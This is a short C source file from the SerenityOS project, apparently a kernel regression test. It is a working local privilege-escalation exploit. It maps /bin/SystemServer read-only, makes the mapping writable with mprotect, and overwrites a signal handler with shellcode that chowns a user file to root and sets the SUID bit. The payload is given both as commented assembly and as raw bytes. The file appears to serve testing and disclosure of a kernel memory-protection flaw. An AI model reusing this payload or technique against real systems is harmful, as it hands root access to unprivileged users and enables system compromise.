jcs.org
Serenity Operating System
1/*
2 * Copyright (c) 2018-2020, the SerenityOS developers.
3 *
4 * SPDX-License-Identifier: BSD-2-Clause
5 */
6
7#include <AK/Types.h>
8#include <fcntl.h>
9#include <stdio.h>
10#include <string.h>
11#include <sys/mman.h>
12#include <unistd.h>
13
14int main()
15{
16 int fd = open("/bin/SystemServer", O_RDONLY);
17 if (fd < 0) {
18 perror("open");
19 return 1;
20 }
21 u8* ptr = (u8*)mmap(nullptr, 16384, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
22 if (ptr == MAP_FAILED) {
23 perror("mmap");
24 return 1;
25 }
26
27 if (mprotect(ptr, 16384, PROT_READ | PROT_WRITE) < 0) {
28 perror("mprotect");
29 return 1;
30 }
31
32 /*
33 *
34 * This payload replaces the start of sigchld_handler in the /bin/SystemServer file.
35 * It does two things:
36 *
37 * chown ("/home/anon/own", 0, 0);
38 * chmod ("/home/anon/own", 04755);
39 *
40 * In other words, it turns "/home/anon/own" into a SUID-root executable! :^)
41 *
42 */
43
44#if 0
45 [bits 32]
46 [org 0x0804b111]
47 jmp $+17
48 path:
49 db "/home/anon/own", 0
50 mov eax, 79
51 mov edx, path
52 mov ecx, 0
53 mov ebx, 0
54 int 0x82
55 mov eax, 67
56 mov edx, path
57 mov ecx, 15
58 mov ebx, 2541
59 int 0x82
60 ret
61#endif
62
63 const u8 payload[] = {
64 0xeb, 0x0f, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x61, 0x6e, 0x6f,
65 0x6e, 0x2f, 0x6f, 0x77, 0x6e, 0x00, 0xb8, 0x4f, 0x00, 0x00, 0x00,
66 0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xbb,
67 0x00, 0x00, 0x00, 0x00, 0xcd, 0x82, 0xb8, 0x43, 0x00, 0x00, 0x00,
68 0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x0f, 0x00, 0x00, 0x00, 0xbb,
69 0xed, 0x09, 0x00, 0x00, 0xcd, 0x82, 0xc3
70 };
71
72 memcpy(&ptr[0x3111], payload, sizeof(payload));
73
74 printf("ok\n");
75 return 0;
76}